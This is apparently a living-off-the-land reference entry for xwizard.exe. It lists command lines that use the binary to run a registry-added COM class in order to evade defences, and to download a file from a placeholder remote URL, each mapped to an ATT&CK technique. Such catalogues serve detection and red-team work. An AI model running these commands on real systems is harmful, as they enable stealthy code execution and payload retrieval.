.. /Xwizard.exe
Execute custom class that has been added to the registry or download a file with Xwizard.exe
Paths:
- C:\Windows\System32\xwizard.exe
- C:\Windows\SysWOW64\xwizard.exe
Execute
-
Xwizard.exe running a custom class that has been added to the registry.
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
- Use case
- Run a com object created in registry to evade defensive counter measures
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1218
- Tags
Execute: COM
-
Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
- Use case
- Run a com object created in registry to evade defensive counter measures
- Privileges required
- User
- Operating systems
- Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
- ATT&CK® technique
- T1218
- Tags
Execute: COM
Download
-
Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z{REMOTEURL}
- Use case
- Download file from Internet
- Privileges required
- User
- Operating systems
- Windows 10, Windows 11
- ATT&CK® technique
- T1105
- Tags
Download: INetCache